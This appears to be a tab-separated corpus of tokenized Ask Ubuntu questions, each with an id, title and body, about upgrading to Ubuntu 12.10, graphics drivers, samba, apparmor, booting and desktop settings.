202860	what are the major differences between ubuntu 12.04 and 12.10 in terms of security ?	i use ubuntu 12.04 . recently , 12.10 was released . i 'd like to upgrade but i want know what the benefits are in using ubuntu 12.10 over ubuntu 12.04 first . my requirement is here security , is there any security difference existed between ubuntu 12.04 and ubuntu 12.10 ? how best i can protect my pc ?
202864	can not access windows shares on win-7 from ubuntu 10.04 after copied files from another win-7	hi i know samba problems is all over the places . but i am through with searching none of the solution worked for me ( disable firewall , install that lib , config smb.conf and stuffs ) actually the windows share is accessible from ubuntu without any problem , but not until there 's file transfer from another win-7 machine to/from the shared folder . then none of my ubuntu machine can access the share again until win7 is rebooted . $ smbtree will show .. \\win7 failed negprot : errnomen $ smbclient -l win7 protocol negotiation failed : errnomem and as always , nautilus will show could not display `` smb : //win7/folder '' error : failed to mount windows share please select another viewer and try again . any clue ? thank you so much in advance .
202873	cron can not run gnome-terminal	i set the following cron in my local machine . * * * * * /bin/bash -c /home/jsx/stuff/j/login-check/open-console.sh the content of open-console.sh is the following : - # ! /bin/sh gnome-terminal -- full-screen -- hide-menubar -e /home/jsx/stuff/j/login-check/handle-user.sh it is supposed to open another sh script in terminal . but nothing is happening . is there anything else i need to do ? like restarting a service or something for the cron job to start running ? *** absolute paths given in the files are correct . when i entered the command /bin/bash -c /home/jsx/stuff/j/login-check/open-console.sh directly in the terminal , it worked .
202874	how can i disable window minimizing on middle mouse button click in xubuntu ?	it 's very annoying especially when closing tabs in a browser . if a middle mouse button is pressed to often then you accidentally minimize a browser 's window . that 's not ok .
202876	why does n't ubuntu boot ?	i downloaded the ubuntu-12.10-desktop-amd64.iso . then i created a bootable usb stick using the guide from here . i booted the usb stick and after the ubuntu logo and some circles loaded beneath it , nothing happened . so i went on to burn a dvd following these instructions . i booted the dvd and this error was rendered : general error mounting filesystem a maintenance shell will now be started control-d will terminate this shell and reboot the system give root password for maintenance ( or type control-d to continue ) '' why ca n't i run ubuntu ?
202882	is my computer slow due to lack of swap	a few months ago , i installed ubuntu 12.04 alongside with windows 7 on my asus eee-pc 1015bx . it has a tendency of freezing and when trying to investigate i found that a swap partition of only 256 mb had been created . the asus eee-pc 1015bx is born with 1 gbyte ram only and it is not possible to add further or exchange the existing 1 gbyte with a larger card . when looking at the system monitor , it looks like all swap is being utilized along with 70-75 % of the ram , even with very few applications running . can the lack of much swap space be the reason for my computer running slowly and at times freezing ? how can i add a swap partition ? or should i add a swap file instead ? at the moment , i see two partitions when viewing the system monitor : one 28.6 gbyte ext4 partition which must be the one containing ubuntu and one 100 gbyte fuseblk partition which i assume is the one holding windows . it shows that i have 18.6 gbyte free space on the ext4 partition . can i `` take a bite '' from the ext4 partition and convert this into a swap partition ? i was thinking something like 3 gbytes for swap considering my limited ram . i hope that someone can guide me through . thank you . 20th oct 2012 - further details thank you for below answer which i find very useful . i am certainly considering switching to one of your suggested shells as i can see from the internet that many have posted that these require much fewer resources than ubuntu . it seems to me that lubuntu is the perfect match for my very limited computer . i will have to wait a few days , though , as i am presently limited by a very slow and restricted internet connection via satellite . but will lubuntu install as simply another shell replacing unity or will it replace ubuntu all together ? will the software that i have installed under ubuntu still be accessible in lubuntu ? and can i return to ubuntu if required ? regarding the actual question of swap : when i run gparted , it shows me that there is one ntfs partition of 100 gbytes from where it boots and the before mentioned ext4 partition of 28.6 gbytes is not mentioned . could it be that my ubuntu installation resides inside this 100 gbytes ntfs partiotion ? and if so , can i take a bite of this for my swap partition ? realising that gparted is shown in danish , i hope that you can make out what i mean . system monitoring shows below details : once again i sincerely hope that you can help . thank you .
202887	my ubuntu system does n't shutdown . stays in splash screen	i updated from ubuntu 11.10 , i had installed also xfce on that version but mainly used unity , after i upgraded to 12.04 when i shutdown it does n't shutdown it remains in a xubuntu splash screeen . i mention that i did't installed , xubuntu but probably installing xfce installed also that splash screen . how can i fix that and make the system shutdown without using hard shutdown ?
202890	ati : no launcher or top bar in 12.10	after upgrading to 12.10 , i see no side bar or top bar . if i do unity restart , then compiz crashes ( i get a window telling me that and i can send an error report ) . i have ati mobility radeon 2400 and i have uninstalled the `` fg-something '' extra drivers ( because i had the same problems with that installed ) . also , in case it 's related , the display resolution is no longer set to the native resolution of the screen . how can i get the launcher and top bar to load properly at startup ?
202897	how do i install ubuntu 12.10 from 12.04 ?	i tried using update manager but midway i had to stop it and log out and now everything is messed up . i typed , sudo apt-get upgrade to get the upgrade to complete and it failed whenever i open update manager i get the following error : not all updates can be installed and then it goes on to talk about partial upgrades and says that , `` this can be caused by : a previous upgrade which did n't complete '' some other problems include no unity panel even when i start the app , when i log out and log back in the only desktop environments were : one cairo-dock , ( gnome ) gnome ( without effects ) gnome please help me i am desperate the only solution i can think of is removing ubuntu and installing 12.10 from scratch .
202902	no more access to google calendar from evolution since upgrade to 3.6 ( quantal )	after i upgraded to quantal , evolution asked to create a new identity ( as if the previous config and prefs were vanished ) . when creating the calendar , it ca n't establish a connection with the server , and if i try to retrieve the calendars i receive an `` http error : method not allowed '' ... please help !
202906	are console and gnome applications using different sudoers file ?	according to our office admin rules , developer 's machines should not have admin privilege , which i hated so much . so i decided to enable the sudo access with some work around found in web ( booting with single user mode ) . and did it successfully but one strange behaviour which i donât know why . 1 ) sudo option works in terminal ( like if i install any application through terminal ) 2 ) i can not open synaptic package manager for which you need admin privilege with my user i am not able to open it . so my question how my user is administrator while working with terminal but not with xwindow application ( gnome or kde ) . are console and gnome applications using different sudoers file ?
202910	how to move window control buttons to the right ?	is there a way in 12.10 to move the close , minimize and maximize buttons back to where they belong ( on the right ) ?
202912	compiz wallpaper plugin does n't exist in ubuntu 12.10	i just upgraded to quantal and once i installed ccsm and compiz-plugins-extra i could n't find the wallpaper plugin , among other plugins that i used to use in 12.04 . could someone please tell me what happened\where they are ?
202913	script to un-hide files with specific extention in folders reccursively	i have this folder that contains many folders , each containing many files with the name structure .xyz.zip . i 'd like to rename them ( using bash ) to xyz.zip ( i.e . un-hide them ) . i 've seen a question attempting to do a similar thing , alias deannoy='for annoyingbak in *.bak ; do mv `` $ annoyingbak '' . `` $ annoyingbak '' ; done ' > > ~/.bashrc & & . .bashrc but i 've not been able to manage to change so it 's done recursively for all folders down from the current folder .
202925	nvidia quadro k2000m on dell precision m4700 - drivers not working	i just did a fresh install of ubuntu 12.04 lts and installed the nvidia drivers from their website ( 304.60 latest long lived branch ) . they are just not working . resolution is down to 640x540 or something . i run sudo nvidia-xconfig getting as result : using x configuration file : `` /etc/x11/xorg.conf '' . backed up file '/etc/x11/xorg.conf ' as '/etc/x11/xorg.conf.backup' new x configuration file written to '/etc/x11/xorg.conf' but when i try to open the settings with nvdia-settings i get : you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run `nvidia-xconfig` as root ) , and restart the x server . hence i restart the x server ( sudo restart lightdm ) but once again i get the same results . here is my xorg.conf file : memecs @ memecs-drz : ~ $ cat /etc/x11/xorg.conf # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 304.60 ( buildmeister @ swio-display-x86-rhel47-04.nvidia.com ) sun oct 14 21:34:47 pdt 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection any help is really appreciated . thanks !
202926	how to use nvidia geforce m310 on ubuntu 12.10 running as guest in virtualbox ?	last couple of weeks played around with ubuntu 12.10 . this is running as a guest on virtualbox hosted at windows 7 . there have been some challenges with the unity 3d stuff . particular due to not supporting x11 release 1.13 till very recently . since today we are able to download virtualbox version 4.2.2 which has through guest additions also support for x11 release 1.13 . so far great work everybody . since unity now only runs in 3d mode it would be nice to access the graphics card directly from virtualbox . lshw -c display shows : vga compatible controller ; product : virtualbox graphics adapter . question : how to get the 3d and other graphics directly supported by the hardware ie nvidia geforce m310
202931	confusion regarding fglrx in ubuntu 12.10	i have an ubuntu 12.04 system with an amd radeon hd 4670 graphics card running beautifully . i am interested in upgrading to 12.10 but unsure about catalyst ( fglrx ) support for the card . the latest driver does n't support the card . can i use the legacy ( 12.6 ) driver for ubuntu 12.10 . is the support available through jockey ? does the legacy driver support the x-org server in 12.10 ? is there a ppa or way to downgrade the x-server ? thanks in advance
202932	how to make synapse control rhythmbox ?	synapse can control banshee just fine . commands such as `` pause '' , `` next '' , `` play '' work fine ; however , the same is n't true for rhythmbox . synapse falsely believes that rhythmbox is not installed and thus i ca n't enable the controls . is there a way to fix this ?
202933	ubuntu 12.04 monitor goes to sleep and wo n't wake up	we have about 80 systems running ubuntu 12.04 64bit desktop edition . we are facing a strange problem . everything works fine except that after the monitor goes to sleep , if we do n't wake it for long time then it stucks and wo n't wake up even if we keep pressing any key . but all tty consoles are working . also i checked the syslog and it was showing the following warning message : lightdm : pam_ldap : could not open secret file /etc/ldap.secret ( no such file or directory ) also if i pull out the power cable of monitor and insert it back ( once the monitor led goes from orange to black ) , the screen comes back and this time also the same above message is logged in the syslog . ( the message may be totally unrelated to the error but since it was being logged by lightdm i did n't ignore it ) . in pm-powersave.log i am getting the following line in the end /usr/lib/pm-utils/power.d/xfs_buffer false : not applicable . also sometimes the following message is being also logged kernel : [ 181899.744014 ] [ drm ] gmbus timed out , falling back to bit banging on pin 6 [ i915 gmbus reserved ] kernel : [ 181901.504013 ] [ drm ] gmbus timed out , falling back to bit banging on pin 0 [ i915 gmbus disabled ] about every 30 minutes . could someone please suggest what could be the possible reason for such a behavior .
202939	how to remove window decorations in cinnamon / muffin ?	i have installed cinnamon and muffin and i love them . finally , i have a working expo ! however , i would like to remove all window decorations : i resize and move the windows with alt-mouse , and close them with alt-f4 ; i have absolutely no need for a title bar . however , i ca n't seem to find a similar setting for cinnamon . is it possible to get rid of all window decorations in cinnamon ?
202941	broken icons with faenza theme	i just installed ubuntu 12.10 but i have an issue i installed faenza icon theme with this way : http : //handytutorial.com/install-faenza-icons-ubuntu-12-10/ but when i switch to faenza theme from gnome tweak tool some icons are broken . for example i attach screenshots : any idea why this happens ?
202944	how to make unity 's dash save the results filtering ?	the dash can remember the settings for filtered results for the entire session , but not beyond that . once the profile is logged out and back in the results would reset to their original settings ; displaying all the results without filtering . how can i make the results filtering more permanent ? ie : how to make the photo lens for instance always show photos from `` this computer '' and not from picasa or facebook across sessions and not just temporarily ?
202945	how to upgrade from 12.04 to 12.10 using cd ?	can anyone tell me how to upgrade from ubuntu 12.04 to 12.10 from a cd
202946	problem with documents in dash	i need help in this problem : i have changed my username ( in all the config files like shadow , user , group , etc . ) from osca to oscar . of course , i 've changed the /home/osca directory to /home/oscar as well . all the system works like a charm with quantal quetzal , but when i try to search in any of my personal directories from the dash , the download directory for example , ubuntu shows me this error : ca n't find âť/home/osca/downloadsâť it 's like unity does n't recognize the new name of the home . any help ?
202951	is watching a video on hdd using vlc , or a youtube video in a browser considered as 'computer idle ' ?	i have ubuntu 11.04 ( natty ) . i have read 'screen goes blank when vlc is playing video ' . my question is similar , but also i have this problem when viewing a video on youtube . i am not quite clear about the meaning of 'computer idle ' . is it considered idle only when the keyboard or mouse is not being used ? because , when watching a video stored on hdd using vlc , or when watching a youtube video in a browser , there is some disk activity . and i was thinking that this means that the computer is not idle . in system settings - > control center - > screensaver preferences , i have a check mark for 'activate screensaver when computer is idle ' set to 5 min . and the screen goes blank while watching videos in vlc or in a browser . the answer suggested in the question refered to above ( screen goes blank when vlc is playing a video ) suggests to disable the screensaver . i was hoping not to have to turn off the screensaver each time i want to watch a video . i wanted to understand the meaning of 'computer idle ' so i have asked this as a separate question rather than asking this in the above referred question .
202954	12.10 unity gui not displaying	i had 12.04 installed and had no problems at all , having had it setup on my compaq presario cq62 for about 2 weeks ( i 'm new to ubuntu and i had a spare laptop to experiment with ) . last night , i installed 12.10 through the update manager . now , i 'm not seeing the unity gui if i select default or ubuntu , at all , just the eclipse launcher which i had created sitting on the desktop . even hitting the windows key to bring up dash does n't work . but , when i select gnome during login , i 'm able to access everything in the gui , including the menu folders for games , internet , system settings , etc . there was a couple error message saying that a system file was n't loading properly but i forgot to write these down , and now these error messages are n't loading when i restart . will i need to wipe clean and reinstall ?
202955	clean nodes after destroy-environment ?	is there possible to deploy services and after that somehow clean nodes ( delete services installed before ) for example i deploy wordpress and even i destroy envirement after that on node is nginx started everytime , even is something else . and now when i deploy again wordpress another istance of nginx is installed so this is conflict . is there posibble to clean node after destroy-environment ?
202966	can not boot into windows after installing server 9.04	i was installing ubuntu server 9.04 on my laptop running on windows 7 x64 . i installed it from cd and i 'm not very sure about how the partitioning system as shown on the setup . i 'm not very sure which one i pick and then , after the setup run successfully , i ca n't boot into windows . and when i put the windows installation disk , it ca n't even recognize the type of my disk . it even said it 's not an ntfs file system . my question is , is my data still in there and is there anyway i can retrieve it back ? and , does that mean my disk have been converted to ext2 format ?
202967	can not boot from usb to install 12.10	i am a long time user of ubuntu and this is the first time a such thing happens to me . i usually upgrade from a version to an other , but this time i wish to do a clean install . i want to totally remove my 12.04 and do a clean install of 12.10 , i created a live usb then i restarted my computer to boot from usb , i got the following error : product is covered by one or more of the following patents : us5,434,872 , us5,732,894 , ( and many more ) under that i see : pcie gbe family controller series v2.38 media test failiure exiting pxe rom and then it reboots i 've searched a lot for an answer , i guess the problem is with something in my bios , but i did n't find a fix . i would really appreciate a fix for my problem . my laptop is a toshiba p775 dual boot ubuntu 12.04 and windows 7 .
202969	connecting to internet with 3g modem	im using a 3g modem to try to connect to internet . how to setup my connection in ubuntu 12.04 , i have a vodafone 3g modem ? please help
202976	i have problem on 12.10 64bit with nvidia graphics driver opensource and proprietary ! ca n't change resolution on 3d games	i have problem with nvidia graphics driver opensource and proprietary ! ca n't change resolution on 3d games and there 's a bug there are no kernel sources installed and thus jockey ca n't install proprietary drivers . i ca n't change resolution while on games fullscreen . i tried to install proprietary driver and i could n't plus i could n't login to ubuntu it showed only the desktop photo no dash no nothing . -tried to install kernel sources and blacklist+remove nouveau drivers and then installed the proprietary drivers i hope succesfully . -the problem is the same i ca n't change resolution on 3d games while on fullscreen . i 've installed the sources and be able to install the proprietary nvidia drivers but the problem remains , look what i got in the output of a 3d game exited while i tried to change resolution : x error of failed request : badvalue ( integer parameter out of range for operation ) major opcode of failed request : 150 ( xfree86-vidmodeextension ) minor opcode of failed request : 10 ( xf86vidmodeswitchtomode ) value in failed request : 0x25b serial number of failed request : 497 current serial number in output stream : 499 i 'm giving you more details about my system : i have an nvidia geforce gts 250 , 3,4 ghz quadcore amd phenom2 , 8gbytes of ram . the output of : sudo lshw -c display ; lsb_release -a ; uname -a is the following : *-display description : vga compatible controller product : g92 [ geforce gts 250 ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:18 memory : fa000000-faffffff memory : d0000000-dfffffff memory : f8000000-f9ffffff ioport : ef00 ( size=128 ) memory : fb000000-fb01ffff no lsb modules are available . distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal linux darkpc 3.5.0-17-generic # 28-ubuntu smp tue oct 9 19:31:23 utc 2012 x86_64 x86_64 x86_64 gnu/linux i like ubuntu 's style and user interface but i hate the bad quality of work they do .
202979	ati radeon hd 3200 very slow performance	i used ati fglrx driver for 12.04 with ati radeon hd 3200 . after upgrade to 12.10 - there is no fglrx and the system uses standard opensource ati driver . the driver is very slow especially on playing movies ( including flash movies ) and on scrolling web pages . i attempted to install fglrx* packages but fglrx in the version 2:9.000-0ubuntu3 ( catalyst 1.12.8 ) does not support hd 3200 anymore . i attemtped to install http : //www2.ati.com/drivers/legacy/12-6/amd-driver-installer-12.6-legacy-x86.x86_64.zip which seems to be most recent version supporting hd 3200 . but it fails on kernel module compilation without any meaningful messages in logs . moreover , amd unofficial wiki states that drivers < 1.12.8 do not support kernel 3.5 and xserver 1.13 . see also the comment below . my exact lspci hardware info : 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati rs780 [ radeon hd 3200 ] so the question is : how to diagnose performance issue with open source driver for hd 3200 and tune it to get better performance in everyday usage like movies and page scrolling ?
202981	any one else having problems connecting to imap servers with thunderbird 16.0.1 ?	recently i 've had problems connected to an exchange server configured with imap . the configuration used to work until the system updated to 16.0.1 . - now i get : `` connection to server xxx timed out error '' each time i connect . although i sit behind a proxy , thunderbird has no problems finding extensions or add-ons ( which suggests that the internet works ) and i have tested the imap server with an earlier version of thunderbird ( 3.x ) on windows and got lots of e-mail which suggest the server works . is anyone else having this problem or if not are there any tips for generating more information on the situation ?
202982	older gpu : is it possible to enable unity 2d in quantal quetzal to fix slowness in unity	i just upgraded from precise pangolin to quantal quetzal . i have a nvidia quadro fx 3450 and a intel quad core q9450 2.66 ghz , 8 gb ram , 64 bit cpu in precise i had to use unity 2d to have snappy performance . now in quantal the windowing seems around 30 % slower ( did not measure , arbitrarily based on feel ) . google chrome seems choppy and at times does not respond to mouse clicks . is it possible to enable unity 2d in quantal . alternatively will a gpu upgrade be needed . i do a lot of opengl molecular visualization and was used to turning off compiz/unity 3d to have my gpu devoted to the visualization application rather than windowing . if i can not turn on 2d , i am assuming a new gpu will fix the slowness issue .
202988	how to use a ps/2 mouse ?	i have a ps/2 mouse that always ran fine under ubuntu . this morning , i did a fresh install of quantal , and my mouse stopped working . it works with a usb mouse . weirder , everything was fine when using the live mode . how can i have my ps/2 mouse working again ?
202995	i ca n't run graphical programs with sudo ( ubuntu 12.10 )	if i try to run a program with gui ( e.g . nautilus ) as root , i 'm just getting the following output : gksu nautilus fontconfig warning : `` /etc/fonts/conf.d/50-user.conf '' , line 9 : reading configurations from ~/.fonts.conf is deprecated . invalid mit-magic-cookie-1 keycould not parse arguments : anzeige kann nicht geรถffnet werden :
202997	pc bios does not recognise external hdd as bootable after installing linux	i have a seagate fa goflex desk - 2000 external hard disk . i use it with a dell dimension c521 desk top . the internal hdd of 160 gb is dedicated to running windows vista home premium ( 32 bit ) os . the pc bios can boot off the usb . the goflex drive has seagates pre installed instant back up program etc . i used shrink volume to reduce the single partition to half the size in order to install linux distributions in remaining space . till this point the drive was recognised as bootable by the bios . i wished to first install opensuse 12.2 with grub 2 as bootmanager . the plan was to set up bios booting sequence to internal dvd , external hdd and last the internal hdd . this way if the external drive is not connected or switched on the system boots into windows and if the external disk is connected the boot manager comes into play . this had worked with earlier version installs with legacy grub . i opted to install grub 2 to the /boot partition which is a primary partition ( the second on the external drive ) . the install appeared to have gone ok and this partition shows up with bootable flag in gparted . `` but '' the external drive is no longer bootable ! bios does not recognise its presense nor does windows vista bootrec program when i tried to repair possibly damaged mbr . the first primary partition containing the seagate proprietary software is available to windows os . gparted can see all the partitions . only i cant boot off the drive !
203000	chrome is not running in background	`` continue running background apps '' is checked . there is no chrome entry in startup applications . this command did n't work : google-chrome -- no-startup-window everybody is complaining how to disable chrome running in background and i ca n't enable it . am i missing something ? forgot to add that i am using ubuntu 12.10 and chrome 22 .
203001	what is the correct way to sync thunderbird + lightning	i already tried to manually copy and the paste the profile folder from one instance to another , but the lightning extension is not added when doing this and thus my tasks and events ca n't be synced . for now i do n't need to sync emails , just the calendar events and tasks and also the feed subscriptions . if possible , i would prefer an offline solution , for example via pendrive instead of a storage service such as dropbox .
203004	kernel error on vmware after upgrading to 12.10 from 12.04	i upgraded to 12.10 from 12.04 . i have removed the old kernel 3.2.21 in 12.04 . on start up , i get an error before login , such as vmware ... . in 12.04 , i have installed vmware 9.0 and now in 12.10 , when i open vmware workstation to start a virtual machine , my monitor turns to black and i must logout and login again . how do i fix it ? is related to vmware and kernel or not ?
203011	why upgrade to 12.10 is not shown	when i execute sudo update-manager -d i see a button to upgrade to 12.10 . but when i execute sudo tsocks update-manager -d , i do n't see an option to upgrade to 12.10 . i ca n't execute sudo tsocks release-upgrade . this commands says there is new ubuntu release . why could this happen ? by the way , i am running ubuntu 12.04 . thanks for your help in advance .
203014	how to adjust the appearance of the unity in 12.10 ?	now i updated to 12.10 and would like to adjust the desktop , well unity , appearance . i know there is the theme setting , but i can not adjust the symbol theme or windows decoration with the systemsettings . i used to use the tool `` unsettings '' but it does n't work with 12.10 anymore . ubuntu tweak used to be an option but at this point many features are broken and a lot of settings seem to mess up my system or they do n't change anything at all ( i understand that there has been a design settings change - gsettings , dconf , something ... ) myunity has some options to change stuff but i could n't find it for 12.10 ... not to forget `` gnome-tweak-tool '' which seems to work for most settings but not for all , e.g . it does n't change the mouse cursor and the windows decorations do not show some decorations i 'd like to use and i am also afraid of messing things up because it is supposed to be used in gnomeshell ... actually as i found out right now it really messes things up : fonts get inverted , suddenly high contrast accessibility setings are used in some windows , nautilus has white fonts on white background and even the login manager is a mess now ... so : how can i adjust the theme , symbol , decorations , fonts for the normal user and for the desktop and for the applications including the applications started as sudo user ? i should mention that i upgraded from 12.04 and that some applications like synaptic completely ignore any settings ... sadly it is a mess , there was a time when gnome theming was really well done and very adjustable , i wonder what happened ... just now i read that further development of ubuntu tweak has been stopped . the developer announced that he wo n't go any further with the software and the online services ... that is sad and destroys my hope for easy appearance editing just by waiting ... has been such a nice tool for 12.04 ... r.i.p .
203016	wicd does n't connect to my iphone usb personel hotspot	ubuntu 12.04 64 bit . wicd 1.7.2.3. iphone 4s with ios 6 . when i connect the iphone i see it as a camera . i can share the wifi hotspot ( of course possible even without connecting it ) . dmesg shows : [ 594.800847 ] usb 1-1.2 : new high-speed usb device number 7 using ehci_hcd [ 594.943719 ] ipheth 1-1.2:4.2 : apple iphone usb ethernet device attached ifconfig shows eth1 ( have got eth0 , wlan0 and l0 ) . but how do i make wicd connect to it ?
203018	natural scrolling not working for horizontal scroll , how to fix this ?	i 've enabled natural scrolling via ubuntu tweak 's miscellaneous options , but that does n't seem to take effect for horizontal scroll ; neither in web browsers , nor in nautilus or other native applications . is there a way to enforce this behavior on horizontal scrolling as well ?
203020	which lenovo laptop is featured on the new ubuntu homepage ?	which lenovo laptop is featured on the new ubuntu homepage to highlight 12.10 ( quantal quetzal ) ? http : //www.ubuntu.com/
203021	impossible to get information from update manager	when i press the button `` check '' to find updates , i always get this error : failed to get information from repository w : failed to fetch http : //ppa.launchpad.net/dylanmccall/ppa/ubuntu/dists/precise/main/source/sources 404 not found , w : failed to fetch htp : //ppa.launchpad.net/dylanmccall/ppa/ubuntu/dists/precise/main/binary-amd64/packages 404 not found , w : failed to fetch http : //ppa.launchpad.net/dylanmccall/ppa/ubuntu/dists/precise/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . i 've noticed that sometimes , in the update manager configuration , there 's the same mexico server instead of spanish , but if i use the spanish server , the problem persists . ... and yes , i removed one of the links to be able to post as a new user . ( htp = http )
203022	ubuntu 12.10 install do n't recognize windows 7	i 'm trying to install ubuntu 12.10 on my sony vaio laptop , which already has windows 7 on it , so i can dual boot . but , when i tried , `` this computer currently has no detected operating system '' . i 'm installing ubuntu from my usb drive . is this normal ? bootinfo
203025	change dash home width	i use ubuntu 12.04 lts and unity 2d on my netbook . i will see dash home full screen ( main menu on all display ) . how can i change its width ?
203035	how to report a bug that occured during a release upgrade ?	launchpad redirects me to a faq page and ubuntu-bug ubuntu-release-upgrader complains the package does not exist .
203037	i ca n't find my launcher	okay , so i 've just updated to ubuntu 12.10 . i then restarted the laptop and signed in to see a blank desktop . i have no side launcher or title bar . i have been to the settings and i 'm not sure if i can do anything there . i tried ; noting worked . i have no desktop shortcuts at all ( i did n't before ) . i need some help here as the launcher is quite important . please help , thanks , jordan p.s . i went a very back door route to get onto the internet .
203039	how do you sync online accounts with the new contacts program in 12.10 ?	i am trying to sync my online accounts ( google , facebook , anything really ) with the new program in ubuntu 12.10 . it gives me the option to change the address book but i ca n't see how to set up an online account anywhere . anyone have any ideas ? am i just not looking in the right place ?
203041	how to remove ubuntu 12.04 ?	i have installed ubuntu 12.04 along with windows vista.but now i want to remove ubuntu . there is no option to remove ubuntu from vista 's control panel.i have not used wubi to install ubuntu but used bootable disc to do so.please someone help me to remove ubuntu .
203042	having problems getting samba4 and bind9 working together because of apparmor	so i 've been following the samba4 howto , which has gone reasonably well . the issue i 'm having is i ca n't get bind9 to restart when the samba configuration is included in /etc/bind/named.conf.local : include `` /var/lib/samba/private/named.conf '' ; but when i try and restart bind9 with sudo /etc/init.d/bind9 restart i get the error in my logs : oct 18 20:25:00 xxxx kernel : [ 251.397899 ] type=1400 audit ( 1350588300.188:16 ) : apparmor= '' denied '' operation= '' open '' parent=1807 profile= '' /usr/sbin/named '' name= '' /var/lib/samba/private/named.conf '' pid=1810 comm= '' named '' requested_mask= '' r '' denied_mask= '' r '' fsuid=105 ouid=0 i 've got the following rules in /etc/apparmor.d/usr.sbin.named ( which i thought were a bit ott but i 've been debugging for hours now ) /var/lib/samba/ rw , /var/lib/samba/* rw , /var/lib/samba/private/ rw , /var/lib/samba/private/* rw , /var/lib/samba/private/dns/ rw , /var/lib/samba/private/dns/* rw , for completeness , the perms on the offending file are : -rw-r -- r -- 1 root root 384 oct 17 11:39 named.conf i tried putting apparmor into complain mode , disabling the named profile , and bind9 starts perfectly and samba works . but as soon as i restart the box , it 's broke again , and i 'd prefer to understand whats going on then taking bits of the servers 's security out to make stuff work . ~ sudo aa-complain /usr/sbin/named setting /usr/sbin/named to complain mode . ~ sudo /etc/init.d/bind9 restart * stopping domain name service ... bind9 rndc : connect failed : 127.0.0.1 # 953 : connection refused ... done . * starting domain name service ... bind9 ... done . any help appreciated .
203044	dns resolution fails after 12.10 upgrade	after my upgrade to 12.10 , dns resolution seems to fail for both local and external addresses . i can successfully ping local and external ip addresses ( google.com , at least ) , but pinging dns names immediately returns ping : unknown host < hostname > . connection information seems to list the correct dns servers ( which i can ping successfully ) , and changing to google public dns produces similar results . what should i fuss with to try to fix this ?
203046	how to print from a canon mg2120	i am not able to print from my ubuntu machine to my canon mg2120 printer . canon does not have a driver for this printer on a linux machine . i do not know if a driver is required . can it be done on my current operating system ? can it be done on the new one that is being offered for download .
203050	does cuda work on 12.10 ?	has anyone tryed cuda on ubuntu 12.10 with blender or another programm ? in the last beta of quantal cuda was n't working . i would like to update from 12.04 to 12.10 final but only if cuda still works . is there someone who already has experience with this ? thanks
203051	how do i install nvidia gt 440 graphics drivers on ubuntu 12.10	i have been having a problem where the screen 'blinks ' twice every 5-10 seconds . the blink is like somebody is turning my monitor off 2 times quickly . i believe this is due to my graphics drivers , if not could anybody please explain what it is as i am a beginner to ubuntu . i try to download the correct graphics card drivers but it comes up with a .run file and i am not sure what to do from here ? i do n't know how to install the drivers basically , if anybody could tell me it would be much appreciated .
203052	how can i install ubuntu server on a usb stick ?	what do i need to install a ubuntu server on a usb stick ? i do n't want to create a bootable stick , but really install the system there .
203064	missing wobbly windows effect	just installed 12.10 then ccsm but there is no option for wobbly windows . any one got this working or know a plug-in ? ( i am using nvidia graphics ) .
203065	skype installs , but test call fails in ubuntu 12.04	skype installs fine using command : sudo apt-get install skype and i could type text messages with my friends in skype , but i could not make any video calls ( my webcam logitech c270 is fine -- -it works great with guvcview application ) . i ca n't even make the test call to the skype echo service ... it just says `` call failed '' . i removed and reinstalled skype using command : sudo apt-get remove skype and the same thing kept happening . what is going on ? [ update ] so even though the skype test call service fails ... .actual calls with other people work fine . so no complaints -- its not like i wanted to have a conversation with the robot anyways .
203072	with wubi how can i install 12.04 and not 12.10	i installed 12.10 using wubi but i found that there were issues with it ( really slow and i could not install skype ) . according to the ubuntu website when running wubi you can choose 12.04 or 12.10 but i can not see how
203074	new windows are placed too high and the window toolbar goes behind the	i changed some settings in compiz and now the new windows are placed too high and behind the panel . the settings that i changed were disabling the visual effects only . it is really annoying to always drag the windows down . there is a similar question though but no real answer is given . the same problem also exists with the wallpaper . it is placed behind the panel and you can not see that part of image .
203075	howto disable 3d effects/compiz on 12.10 ?	what would be the best way to disable 3d effects/compiz on ubuntu 12.10 ( quantal quetzal ) ? i found a way to disable some effects by switching to llvmpie-rendering ( meant for low-spec pcs and to save battery ) . but it seems to be very buggy and not ready to use - so i disabled it again ! ps : i welcome any additional tip/tweak to increase the overall snappiness on old hardware : - )
